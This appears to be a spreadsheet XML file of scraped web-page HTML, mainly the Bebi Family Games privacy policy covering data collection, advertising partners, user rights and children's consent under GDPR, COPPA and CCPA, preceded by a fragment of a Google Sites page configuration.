    <t>nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1Hm5--CHMJcXc-rQIrskSChgfC-BXDlJIZaH-mb0c84XDZarn5jrI66M4AW4x2yRkY-FK7",1,"CPrLuPC3pf4CFQ51awodi_QM_g",1681340077319795,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786303,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347752,50455861,50468101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0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://756690166-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https://sites.google.com/view/fpg-ent-privacy-policy",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[1681340077331,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"db44c4b22382d2339c944d9e040566e95bd3f02a23eb808129eb3da1508c9fcf","normalizedPath":"view/fpg-ent-privacy-policy/home","pageTitle":"Home"};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nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;&lt;/script&gt;&lt;script nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
 &lt;/script&gt;&lt;script nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;const imageUrl = 'https:\/\/lh3.googleusercontent.com\/cH9kSr7jMkMUd-OIj9Qg-6Z2g55haIrrkA_22ISddvlTUL2_9AN2R32cf9y-9DljgGmzaQ\x3dw16383';
      function bgImgLoaded() {
        if (!globals.headerBgImgLoaded) {
          globals.headerBgImgLoaded = new Date().getTime();
        } else {
          globals.headerBgImgLoaded();
        }
      }
      if (imageUrl) {
        const img = new Image();
        img.src = imageUrl;
        img.onload</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta charset="utf-8"&gt;_x005F_x000D_
    &lt;title&gt;Bebi Family Games Privacy Policy&lt;/title&gt;_x005F_x000D_
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;_x005F_x000D_
    &lt;meta name="robots" content="nofollow,noindex" /&gt;_x005F_x000D_
    &lt;meta name="twitter:site" content="@BebiFamily"&gt;_x005F_x000D_
    &lt;meta name="twitter:card" content="summary_large_image"&gt;_x005F_x000D_
    &lt;meta name="twitter:image:alt" content="Bebi Family Games Privacy Policy"&gt;_x005F_x000D_
    &lt;meta property="og:title" content="Bebi Family Games Privacy Policy"&gt;_x005F_x000D_
    &lt;meta property="og:description" name="description" content=""&gt;_x005F_x000D_
    &lt;meta property="og:image:width" content="1200"&gt;_x005F_x000D_
    &lt;meta property="og:image:height" content="628"&gt;_x005F_x000D_
    &lt;meta property="og:image:alt" content="Bebi Family Games Privacy Policy"&gt;_x005F_x000D_
    &lt;meta property="og:image" content="https://bebi.family/img/og-default-temp.jpg"&gt;_x005F_x000D_
    &lt;meta property="og:url" content="https://bebi.family/en/about/privacy-policy"&gt;_x005F_x000D_
    &lt;meta property="og:site_name" content="bebi.family"&gt;_x005F_x000D_
    &lt;meta property="fb:app_id" content="987194655511935" /&gt;_x005F_x000D_
    &lt;link rel="canonical" href="https://bebi.family/go/kr" /&gt;_x005F_x000D_
    &lt;link rel="shortcut icon" href="/favicon.ico"&gt;_x005F_x000D_
    &lt;link rel="preconnect" href="https://fonts.googleapis.com"&gt;_x005F_x000D_
    &lt;link rel="preconnect" href="https://fonts.gstatic.com" crossorigin&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;700&amp;family=Patua+One&amp;display=swap" media="print" onload="this.media='all'"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="/css/style.min.css?v=Eir7WAZYgRCuJY9hh8Ij9RcOqt2MTh2MX-8Li1aHCQo" media="print" onload="this.media='all'" /&gt;_x005F_x000D_
    &lt;style type="text/css"&gt;_x005F_x000D_
        #body-loader {_x005F_x000D_
            position: fixed;_x005F_x000D_
            top: 0;_x005F_x000D_
            left: 0;_x005F_x000D_
            bottom: 0;_x005F_x000D_
            right: 0;_x005F_x000D_
            z-index: 9999;_x005F_x000D_
            background-color: #fff_x005F_x000D_
        }&lt;/style&gt;_x005F_x000D_
    _x005F_x000D_
    &lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-PHJWPWK');&lt;/script&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
    &lt;div id="body-loader"&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
    &lt;nav class="navbar navbar-expand-md navbar-dark fixed-top bg-bebi"&gt;_x005F_x000D_
        &lt;div class="container p-0"&gt;_x005F_x000D_
            &lt;div class="nav-header"&gt;_x005F_x000D_
                &lt;button class="navbar-toggler" type="button"_x005F_x000D_
                        data-bebi-toggle="collapse"_x005F_x000D_
                        data-bebi-target="#navbarCollapse"&gt;_x005F_x000D_
                    &lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;_x005F_x000D_
                &lt;/button&gt;_x005F_x000D_
                &lt;a class="navbar-brand text-center" href="/"&gt;_x005F_x000D_
                    &lt;img id="nav-brand" src="https://cdn.fndr.ge/images/bebi.family/logo/bebi-family.svg" alt="bebi family" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a id="navbar-contact-wrapper" href="/en/contact"&gt;_x005F_x000D_
                    &lt;span class="navbar-contact-icon"&gt;&lt;/span&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="collapse navbar-collapse" id="navbarCollapse"&gt;_x005F_x000D_
                &lt;ul class="navbar-nav me-auto mb-md-0"&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/en/about/curriculum"&gt;Curriculum&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/en/games"&gt;Games&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/en/blog"&gt;Blog&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link" href="/en/about/us"&gt;About Us&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                    &lt;li class="nav-item"&gt;_x005F_x000D_
                        &lt;a class="nav-link " href="/en/contact"&gt;Contact &amp;amp; Support&lt;/a&gt;_x005F_x000D_
                    &lt;/li&gt;_x005F_x000D_
                &lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
                &lt;div id="navbar-store-wrapper"&gt;_x005F_x000D_
                    &lt;div class="text-center pb-3"&gt;25 Million Kids are learning with us&lt;/div&gt;_x005F_x000D_
                    &lt;div id="navbar-store"&gt;_x005F_x000D_
                        &lt;a href="https://apps.apple.com/us/developer/bebi-family-games/id1498726682" target="_blank"&gt;_x005F_x000D_
                            &lt;img id="navbar-apple" src="https://cdn.fndr.ge/images/bebi.family/general/download-on-the-app-store.png" alt="download on the app store" /&gt;_x005F_x000D_
                        &lt;/a&gt;_x005F_x000D_
                        &lt;a href="https://play.google.com/store/apps/dev?id=5122078557185708602" target="_blank"&gt;_x005F_x000D_
                            &lt;img id="navbar-google" src="https://cdn.fndr.ge/images/bebi.family/general/get-it-on-google-play.png" alt="get it on google play" /&gt;_x005F_x000D_
                        &lt;/a&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/nav&gt;_x005F_x000D_
_x005F_x000D_
    &lt;main class="container"&gt;_x005F_x000D_
        _ x000D_
 &lt;section class="mt-3 mb-3"&gt;_x005F_x000D_
    &lt;h1&gt;Bebi Family Games Privacy Policy&lt;/h1&gt;_x005F_x000D_
    &lt;p&gt;Effective (last update):&amp;nbsp;30.07.2021&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>This Privacy Policy sets forth the data collection and data processing practices and principles we employ at&amp;nbsp;Bebi Family&amp;nbsp;Games&amp;nbsp;(the &amp;ldquo;Company&amp;rdquo;). Bebi Family Games is the common name we use for our companies one of which is BEBI FAMILY GAMES O&amp;Uuml;, incorporated under the laws of Estonia, with its registered address being at Sakala tn 7-2, Kesklinna linnaosa, Tallinn, Harju maakond, 10141, EE, operating the android mobile applications located at Google Play Store, and Bebi LLC, incorporated under the laws of the Republic of Georgia, with its registered address located at Archil Tsagareli street #78, Tbilisi, Georgia, operating the iOS mobile applications located at the App Store and the Website accessible at &lt;a href="https://www.bebi.family/"&gt;https://bebi.family&lt;/a&gt; (the &amp;ldquo;Website&amp;rdquo;).&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>At Bebi Family Games we respect and care about your privacy. This Privacy Policy explains what kind of information we collect, use, share and the security of your information in relation to our mobile applications (&amp;ldquo;Applications&amp;rdquo; or &amp;ldquo;Apps&amp;rdquo;), related&amp;nbsp;services (&amp;ldquo;Services&amp;rdquo;),&amp;nbsp;and the Website. Please take a moment to familiarize yourself with our privacy practices.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;BY INSTALLING THE APPS ON YOUR MOBILE DEVICE, ENTERING INTO, CONNECTING TO, ACCESSING AND/OR USING THE APPS&amp;nbsp;OR THE WEBSITE, YOU AGREE TO THE TERMS AND CONDITIONS SET FORTH IN THIS PRIVACY POLICY, INCLUDING TO THE POSSIBLE COLLECTION AND PROCESSING OF YOUR INFORMATION AND YOU ARE CONSENTING TO THE USE OF COOKIES AND OTHER TRACKING TECHNOLOGIES ON YOUR DEVICE.</t>
  </si>
  <si>
    <t>PLEASE NOTE: IF YOU OR, AS APPLICABLE, YOUR LEGAL GUARDIAN, DISAGREE TO ANY TERM PROVIDED HEREIN, YOU MAY NOT INSTALL, ACCESS AND/OR USE THE APPS AND YOU ARE REQUESTED TO PROMPTLY ERASE THEM, AND ANY PART THEREOF, FROM YOUR MOBILE DEVICE.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Applicable law&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; This Privacy Policy is designed to meet the requirements of the following legislative acts:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;General Data Protection Regulation of the European Union (&amp;ldquo;GDPR&amp;rdquo;);&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Children&amp;#39;s Online Privacy Protection Act&amp;nbsp;of the United States&amp;nbsp;(&amp;ldquo;COPPA&amp;rdquo;); and&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;California Consumer Privacy Act (&amp;ldquo;CCPA&amp;rdquo;).&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Our compliance with the aforementioned legislative acts, both of which are stringent in nature, means that we are highly likely compliant with the data protection and user privacy legislation set out by many other countries and territories as well.</t>
  </si>
  <si>
    <t>If you are unsure about whether our Services are compliant with your own country of residences&amp;rsquo; specific data protection and user privacy legislation you&amp;nbsp;should contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="264f484049664443444f0840474b4f4a5f08"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;What information we collect&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Our primary purpose in collecting information is to provide you with a safe, efficient and customized experience and to provide you with Services and features that better meet your needs or requests.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We may collect personal and non-personal information from our users. The personal information is the one as defined above under the section &amp;ldquo;what is personal information&amp;rdquo;.</t>
  </si>
  <si>
    <t>The non-personal information is any information that is&amp;nbsp;aggregated or anonymized about our users and other information that does not identify, either directly or indirectly, any individual.&amp;nbsp;We collect non-personal information about your use of our Apps and aggregated information regarding the usages of the Apps.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Currently, we collect the following information from our users:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Data that users give us:&amp;nbsp;We may collect data that a user gives us when downloading, installing, using our Apps. This information may include&amp;nbsp;first name and last name, email address, and password.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;User Analytics Data:&amp;nbsp;We do not collect any information from users of our iOS apps located at the App Store. In our android apps at Google Play Store we may collect information through your use of our Apps.</t>
  </si>
  <si>
    <t>Further, we may collect information about you when you access and use our Website. We collect information such as non personally identifiable app usage data, the device ID, number of sessions, in-app purchases, Application opens, first launches, geography/region, number of users, session duration, Application updates, and operating systems which may be used, either in combination with other data or directly, to identify you. Please note that we do not combine any information to knowingly identify you.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We may use third-party service providers to store the user analytics data.</t>
  </si>
  <si>
    <t>In our choice of the third-party data storage service, we ensure the data stored is safe and secure in terms of technical and organizational measures employed by such a service provider.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;How we use your information we collect&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We use personal information we collect in order to: 1. Track personally unidentifiable usage statistics and use these analytics to improve the quality of our Apps and games, and 2. to find if a new user is acquired from our advertisements.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;We also use the information we have, both personal and non-personal information, internally to monitor and improve the Services, to perform analyses of the behavior of our users, to measure user demographics and interests, to describe our services to third parties such as advertisers, to analyze how and where best to use our resources and to serve you a better and relevant advertising experience on our Apps provided by third-party advertising companies.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;p &gt; We may also use the information we have to provide in-App advertisements directly served to you by us (&amp;ldquo;Internal Ads&amp;rdquo;).</t>
  </si>
  <si>
    <t>These Internal Ads are provided based on your usage of the Apps.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Principles of data processing&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;When you download, install and use our Apps and related Services, we need to collect, use, and otherwise process your information (both personal information and non-personal information), as set out in this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;At Bebi Family Games we understand the value of your privacy and how it is important to you, and we are committed to respect your privacy. We follow the commonly accepted fundamental privacy principles when we process your information:&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;1.</t>
  </si>
  <si>
    <t>Our goal is to collect only the minimum data that we need to deliver any services to you.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;2. We aim for full transparency on how we use your information to comply with legal or other lawful purposes and respect your privacy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;3. We make sure we only use your information for the purposes you have given us permission for.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;4.</t>
  </si>
  <si>
    <t>We make sure we do not store your information for a longer period than necessary.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Legal basis of processing&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;When we collect, use, store or process, in any other way, your information, we rely on a number of legal bases, as set forth in this Privacy Policy:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Consent: we rely on your consent to store and use your personal information you provided to us. You may withdraw your consent at any time by contacting us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b7ded9d1d8f7d5d2d5de99d1d6dadedbce99"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; If you do not consent to the use of your personal data we may not be able to provide you with all or parts of our services.</t>
  </si>
  <si>
    <t>However, you may still be able to access and use some parts of our Apps, Website and/or related services without giving us your personal data.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Contract: we rely on the contractual relationship for the use of your information which is necessary to perform any contractual obligations in order to provide any services to you;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;When we are required by law: we may have certain legal obligations in the countries where we operate. These legal obligations may require us to process your personal data under certain circumstances. In such cases, we may rely on these legal obligations which we are required to comply with (e.g. a legal obligation, a court order, or to exercise or defend legal claims) in order to store and use your personal information.</t>
  </si>
  <si>
    <t>For example, when we are requested to disclose your personal information to regulatory bodies or law enforcement authorities.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Our legitimate interests: we may also count on our legitimate interests to use your information, such as to:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;bull; deliver, modify, enhance our services;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;&amp;bull; enhance the security of our Apps and information systems;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;bull; better understand how people interact with our Apps and games.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;When we rely on our legitimate interests as a legal basis, we make sure that the rights and freedoms of our users are not jeopardized. In cases where your rights and freedoms override our legitimate interests we refrain from using your information, unless there is another appropriate legal basis allowing us to continue processing.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;How we share the information we collect&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;All personal information collected by us is treated as confidential.</t>
  </si>
  <si>
    <t>We do not share any of your personal information with any third parties for any purposes, subject to the certain exceptions.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We accept advertisements from third party ad networks which may be displayed in our Apps. We may share certain information with third-party advertisers, ad networks and ad platforms (&amp;ldquo;Advertising Entities&amp;rdquo;)&amp;nbsp;to develop and deliver targeted advertising in the Apps. We may also allow Advertising Entities to collect personal and non-personal information within the Services which they may share with us, including your device identifier, device type, device brand, device model, network type, device language, and IP address.</t>
  </si>
  <si>
    <t>Advertising entities may also collect non-personal information related to the performance of the advertisements, such as how many times an advertisement is shown, how long an advertisement is viewed, and any click-throughs of an advertisement.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;Further, we may disclose entire or part of your personal information, alongside non-personal information in the limited circumstances described below and with appropriate safeguards applicable thereto:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;-&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;We may disclose personal information about you in response to a subpoena, court order, or other legitimate governmental requests.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;-&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;We may share your personal information with our affiliate companies, subsidiaries, business partners, external consultants, auditors, collaborators or other third parties, some of our employees, and individuals who are our independent contractors that need to know the information in order to assist us provide our services.</t>
  </si>
  <si>
    <t>Please note, we require all of them to comply strictly with this Privacy Policy and educate them regularly on the importance and value of your personal information.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;-&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;We may share information with third party vendors that help us provide our services such as trusted vendors we partner with that perform analysis of our services or user demographics and do market research that help us understand and enhance our services. This group also includes third party providers that perform analytics services.</t>
  </si>
  <si>
    <t>We will only share information about you that is necessary for the third party vendor to provide the requested service. These parties will process the provided data under instructions of Bebi Family Games and in compliance with this Privacy Policy. We do not authorize vendors to retain, share, store or use your personally identifiable information for any&amp;nbsp;secondary purposes.&amp;nbsp;We may also use third-party services providers to host the data we have.</t>
  </si>
  <si>
    <t>When we choose this service provider we take into account the privacy practices and principles employed by such a service provider and their commitment to comply with applicable data protection laws, including the GDPR. The third-party vendors we use may be located in the territory of the United States, and the European Union.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;-&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;We may also share your information in connection with any merger, acquisition of all or a portion of our business by another company, sale of company assets, or in the unlikely event that Bebi Family Games goes out of business or enters bankruptcy, user information would likely be one of the assets that is transferred or acquired by a third party. If any of these events happens, we will make sure to take any relevant and reasonable steps to notify you and this Privacy Policy would continue to apply to your information and the party receiving your information shall continue to use your information, but only consistent with this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Links to third-party websites and services&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>The Apps may contain links to other websites and online services, including third-party advertisements. If you choose to click through to one of these other websites or online services, please note that any information you may provide will be subject to the privacy policy and other terms and conditions of that website or service, and not to this Privacy Policy. We do not control third-party websites or services, and the fact that a link to such a website or service appears in the Apps does not mean that we endorse them or have approved their policies or practices relating to user information.</t>
  </si>
  <si>
    <t>Before providing any information to any third-party website or service, we encourage you to review the privacy policy and other terms and conditions of that website or service. You agree that we will have no liability for any matters relating to a third-party website or service that you provide information to, including their collection and handling of that information.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;Data retention periods&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We will not keep your personal or non-personal data for any longer than is necessary in light of the reason(s) for which it was first collected.&amp;nbsp;You can always request that we suspend or remove your personal data by writing to &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9df4f3fbf2ddfff8fff4b3fbfcf0f4f1e4b3"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;p&gt;Data subject rights&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;You have the following rights which are accorded to you either by laws and regulations we are bound by, or by our commitment to respect certain data protection and privacy principles.&amp;nbsp;We will always work to uphold your following rights:&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;a)&amp;nbsp;&amp;nbsp;The right to be informed about our collection and use of your personal data.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;b)&amp;nbsp;&amp;nbsp;The right to access the personal data we maintain about you.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>c)&amp;nbsp;&amp;nbsp;The right to have your personal data rectified if any of your personal data held by us is inaccurate or incomplete.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
 &lt;p&gt; d)&amp;nbsp;&amp;nbsp;The right to be forgotten, i.e. the right to ask us to delete or otherwise dispose of any of your personal data that we hold.</t>
  </si>
  <si>
    <t>The right to restrict (i.e. prevent) the processing of your personal data.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;e)&amp;nbsp;&amp;nbsp;The right to object to us for using your personal data for a particular purpose or purposes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;f)&amp;nbsp; &amp;nbsp;The right to withdraw consent.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;g)&amp;nbsp;&amp;nbsp;The right to&amp;nbsp;data portability.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;h)&amp;nbsp;&amp;nbsp;Rights relating to automated decision-making and profiling. We do not use your personal data in this way.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; For any right of yours in relation to your personal information, you can always contact us by writing to&amp;nbsp;&lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="751c1b131a351710171c5b1314181c190c"&gt;[email&amp;#160;protected]&lt;/a&gt;&amp;nbsp;to ask for more detailed information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any cause for complaint about our use of your personal data, you have the right to lodge a complaint with appropriate authorities.</t>
  </si>
  <si>
    <t>That said, we would welcome the opportunity to resolve your concerns ourselves, so please contact us first at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="5d34333b321d3f383f34733b3c3034312473"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Security Measures&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We use industry-standard security measures at Bebi Family Games in order to secure your personal data. We also work with third-party service providers who possess high levels of security measures and provide relevant physical and technical safeguards to keep your personal data secure.&amp;nbsp;We use Secure Sockets Layer (SSL) software to encrypt the information you enter on our Apps and the Website in order to protect its security during transmission to and from our Apps or the Website.</t>
  </si>
  <si>
    <t>We also use security measures such as anonymisation (where possible), physical and logical access control to your personal data, and strong passwords.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We apply access restrictions to your personal data by our employees. We make sure to educate and train our employees about the importance of confidentiality and privacy of customer personal information on a regular basis.</t>
  </si>
  <si>
    <t>We maintain appropriate safeguards to protect your personal information from unauthorized access by our employees.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Please note, despite all the measures we take to maintain the safety and security of your personal information, no transmission over the Internet can ever be guaranteed to be secure. Consequently, we cannot fully guarantee the security of any personal information that you transfer over the Internet to us. We also strongly urge you to keep your password you may have for our Apps or the Website securely.</t>
  </si>
  <si>
    <t>We do not accept any liability for your loss of your password for your own mistake.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;ldquo;Do Not Track&amp;rdquo; Signals&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Currently we do not respond to &amp;ldquo;Do Not Track&amp;rdquo; signals which you can enable in most internet browsers. For the time being there is no industry or a legal standard to recognize or honor these signals. However, we will adjust our practices in line with the developments in this field.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Children&amp;rsquo;s Privacy&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>We offer some parts of our services, particularly the Apps, to children. The laws that we are bound by, such as GDPR, and COPPA, set forth stringent rules for the collection of children&amp;rsquo;s personal data and valid consent relating to children. According to COPPA, we are required to get a consent from a parent or a legal guardian of the child below the age of 13 before they may use our Apps.</t>
  </si>
  <si>
    <t>We are also required to get a consent from a parent or a legal guardian of the child below the age of 16 (in some member states of the EU) before they may use our Apps, in order to be compliant with the GDPR. We do not collect any personal information from children who cannot provide a valid consent according to the laws that apply to us. If a parent or a legal guardian of an underage child thinks that their child is using our Apps without their consent then they can contact us by writing at &lt;a href="/cdn-cgi/l/email-protection#a7cec9c1c8e7c5c2c5ce89c1c6cacecbde"&gt;&lt;span class="__cf_email__" data-cfemail="01686f676e41636463682f67606c686d78"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">We will immediately take actions, including removal of personal information relating to an underage child, subject to proof of identification to prevent any wrongful removal of information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Parents of legal guardians of children have certain rights that they may exercise by directly getting in touch with us via our email address &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="ef86818980af8d8a8d86c1898e82868396c1"&gt;[email&amp;#160;protected]&lt;/a&gt; These rights include:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;Right to know what information we collect about children and how we process this data;&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Right to request removal or rectification of information relating to a child;&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Right to withdraw consent of the collection of personal data of a child.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Changes to our Privacy Policy&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; This Privacy Policy may be updated from time to time for any reason. We will notify you of any changes to our Privacy Policy by posting the new Privacy Policy at:&lt;a href="https://www.google.com/url?q=https://bebi.family/privacy-policy/&amp;amp;sa=D&amp;amp;source=editors&amp;amp;ust=1630843964159000&amp;amp;usg=AOvVaw2I4fDXHTyuh2Z2WwpEXU2y"&gt;&amp;nbsp;&lt;/a&gt;https://privacy.bebi.family/&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
